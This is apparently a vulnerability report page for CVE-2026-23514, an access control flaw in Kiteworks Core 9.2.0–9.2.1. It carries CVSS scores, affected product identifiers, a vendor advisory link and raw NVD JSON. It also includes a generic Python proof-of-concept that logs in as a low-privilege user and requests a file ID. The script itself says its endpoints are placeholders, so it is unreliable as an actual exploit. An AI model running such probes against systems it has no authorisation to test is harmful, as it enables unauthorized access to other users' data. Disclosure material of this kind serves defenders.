Security Vulnerability Report
CVE-2026-23514 CVSS 8.8 HIGH

Published: 2026-03-25 15:16:38
Last Modified: 2026-03-27 18:52:37

Description

Kiteworks is a private data network (PDN). Versions 9.2.0 and 9.2.1 of Kiteworks Core have an access control vulnerability that allows authenticated users to access unauthorized content. Upgrade Kiteworks Core to version 9.2.2 or later to receive a patch.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (the "Secondary" metric in the raw record below)
NVD Primary Metric: 6.5 MEDIUM, vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N (confidentiality impact only, no integrity or availability impact)
Weakness: CWE-282 (Improper Ownership Management)

Configurations (Affected Products)

cpe:2.3:a:accellion:kiteworks:9.2.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:accellion:kiteworks:9.2.1:*:*:*:*:*:*:* - VULNERABLE
Kiteworks Core 9.2.0
Kiteworks Core 9.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
import requests


def verify_vulnerability(target_url, username, password):
    """
    PoC for CVE-2026-23514: Access Control Vulnerability in Kiteworks Core.
    This script attempts to access unauthorized content using a low-privilege user.

    NOTE: the /login and /api/v1/files/{id} paths below are generic placeholders,
    not confirmed Kiteworks API routes. A 200 response only demonstrates the
    flaw if the requested resource is known to belong to a different user.
    """
    session = requests.Session()

    # Step 1: Authenticate as a low-privilege user
    login_payload = {
        "username": username,
        "password": password
    }
    login_resp = session.post(f"{target_url}/login", data=login_payload)
    if login_resp.status_code != 200:
        print("[!] Login failed.")
        return
    print("[+] Login successful.")

    # Step 2: Attempt to access a specific resource ID that should be restricted
    # Example: Accessing file ID 1 or admin configuration endpoint
    # The specific endpoint depends on the application logic, here is a generic example.
    target_resource_id = "1"
    attack_url = f"{target_url}/api/v1/files/{target_resource_id}"
    headers = {
        "User-Agent": "Mozilla/5.0 (PoC Scanner)",
        "Accept": "application/json"
    }
    response = session.get(attack_url, headers=headers, verify=False)
    if response.status_code == 200:
        print(f"[+] Vulnerability confirmed! Successfully accessed restricted resource: {attack_url}")
        print(f"[+] Response data: {response.text[:100]}")
    else:
        print(f"[-] Access denied or resource not found. Status: {response.status_code}")


if __name__ == "__main__":
    # Replace with actual target details
    target = "https://kiteworks-example.com"
    user = "low_priv_user"
    pwd = "password123"
    verify_vulnerability(target, user, pwd)
```

References

https://github.com/kiteworks/security-advisories/security/advisories/GHSA-5gqr-cpr6-wvm5 (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-23514",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-25T15:16:37.967",
    "lastModified": "2026-03-27T18:52:37.110",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Kiteworks is a private data network (PDN). Versions 9.2.0 and 9.2.1 of Kiteworks Core have an access control vulnerability that allows authenticated users to access unauthorized content. Upgrade Kiteworks Core to version 9.2.2 or later to receive a patch."
      },
      {
        "lang": "es",
        "value": "Kiteworks es una red de datos privada (PDN). Las versiones 9.2.0 y 9.2.1 de Kiteworks Core tienen una vulnerabilidad de control de acceso que permite a los usuarios autenticados acceder a contenido no autorizado. Actualice Kiteworks Core a la versión 9.2.2 o posterior para recibir un parche."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-282"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:accellion:kiteworks:9.2.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "E39C1D0F-1FB2-424A-9EE4-5B653A1AC66E"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:accellion:kiteworks:9.2.1:*:*:*:*:*:*:*",
                "matchCriteriaId": "A06208F4-EF54-43E5-84D8-144173AA604A"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/kiteworks/security-advisories/security/advisories/GHSA-5gqr-cpr6-wvm5",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```